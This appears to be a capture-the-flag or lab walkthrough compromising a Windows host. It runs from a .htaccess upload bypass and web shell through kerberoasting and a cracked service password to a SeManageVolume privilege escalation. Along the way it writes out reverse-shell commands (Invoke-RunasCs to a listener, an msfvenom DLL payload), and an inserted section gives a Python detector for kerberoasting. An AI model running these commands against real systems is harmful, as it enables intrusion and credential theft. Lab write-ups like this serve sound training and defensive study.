# 80

![](/files/3Mdntst6TbWsZpwNYp09)

There is a file upload feature: ![](/files/I86CdbylgGiDCqnOqZzS)

Since the server is running Apache, we can try to replace its .htaccess file.

Running feroxbuster also reveals an uploads directory.

We now have `shell.whatevs` in the uploads directory: ![](/files/kVA55XzreqrBVuIEubKt)

For command execution: <http://192.168.183.187/uploads/shell.whatevs?cmd=whoami> ![](/files/OgsQFn2xEDHzS085NkfJ)

Now we run the base64-encoded PowerShell payload: ![](/files/l0kMKY94oa5xmjiAoL3v)

We have 2 service accounts: ![](/files/9CJzk0cOnOGKnlYDE1h9)

We can try kerberoasting:

```powershell
.\Rubeus.exe kerberoast /nowrap
```

![](/files/pHwbun4dfEkxMPHCAssx)

We get a hash for svc\_mssql and crack it with hashcat: ![](/files/gedkkeeAJqW8kgicw0Zg) The password is `trustno1`.
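From the defender's side, a Rubeus kerberoast run like the one above appears on the domain controller as Security event 4769 (TGS request) records with RC4 encryption (type 0x17) for user service accounts, usually several in a short burst from one requester. The following is an added detection example, not part of the original walkthrough; the 4769 records, account names and addresses are constructed.

```python
"""Flag Kerberoast-style TGS requests in Windows Security event 4769 records."""
from collections import defaultdict

# Constructed sample 4769 records (not real logs): one user requesting
# RC4 tickets for two service accounts, plus normal AES/computer traffic.
SAMPLE_4769 = [
    {"TargetUserName": "alice@ACCESS.LOCAL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"TargetUserName": "alice@ACCESS.LOCAL", "ServiceName": "svc_apache",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"TargetUserName": "alice@ACCESS.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"TargetUserName": "bob@ACCESS.LOCAL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9"},
    {"TargetUserName": "bob@ACCESS.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9"},
]

RC4_TYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP


def is_roast_candidate(event):
    """True for an RC4 TGS request to a non-computer, non-krbtgt service.

    Computer accounts (trailing $) have long random passwords and krbtgt
    tickets are normal TGT traffic, so both are excluded from the alert.
    """
    svc = event["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return event["TicketEncryptionType"].lower() in RC4_TYPES


def suspicious_requesters(events, threshold=2):
    """Map requester -> sorted list of SPN accounts for which that requester
    asked RC4 tickets, kept only when at least `threshold` distinct services
    were hit (a single RC4 request may be a legacy client, a sweep is not)."""
    by_user = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            by_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in by_user.items() if len(s) >= threshold}


if __name__ == "__main__":
    for user, services in suspicious_requesters(SAMPLE_4769).items():
        print(f"{user} requested RC4 tickets for {', '.join(services)}")
```

Enabling AES-only encryption on service accounts and replacing weak passwords like the one cracked here removes the RC4 hashes the attack depends on.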

Now, to get a shell as svc\_mssql, we use Invoke-RunasCs with the cracked password:

```powershell
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs svc_mssql trustno1 cmd.exe -remote 192.168.45.229:1234
```

We catch the shell on a listener on port 1234:

```bash
sudo rlwrap nc -nlvp 1234
```

![](/files/J6VTRJU0Vg9Ut0bNrV9k)

![](/files/sYNvxUUATruQqkiy17oD) Now we can use the SeManageVolumePrivilege exploit: <https://github.com/CsEnox/SeManageVolumeExploit/releases>

Run it first:

```cmd
SeManageVolumeExploit.exe
```

Then generate Printconfig.dll with msfvenom:

```bash
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll
```

Transfer it to the target, then copy it into the spooler driver directory:

```cmd
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\
```

Then, in PowerShell, instantiate the COM object:

```powershell
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
```

We should now have a shell on the port 4444 listener: ![](/files/eleq45sO3GLKFM1V8TUZ)
